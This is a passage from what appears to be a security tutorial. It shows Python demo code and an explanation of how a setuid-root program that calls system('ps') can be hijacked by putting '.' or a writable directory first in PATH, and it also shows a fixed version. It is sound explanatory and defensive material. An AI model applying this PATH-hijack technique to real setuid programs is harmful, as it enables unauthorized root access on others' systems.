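        cwd = os.getcwd()                                  # 1st/3rd method: '.' first, run from that dir
        os.chdir(scratch)
        try:
            results["dot_resolves"] = resolve("ps", f".:{TRUSTED_PATH}")
        finally:
            os.chdir(cwd)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
    print("fixed version output starts with:", fixed_procwatch()[:40].strip())
```

The lookup in resolve is the whole story: system("ps") hands the string to /bin/sh, which walks $PATH in order, and the SUID bit means whatever it finds first runs as root. Modern glibc and the kernel ignore LD_PRELOAD and similar variables for setuid programs, but they never sanitize PATH; that is the program author's job.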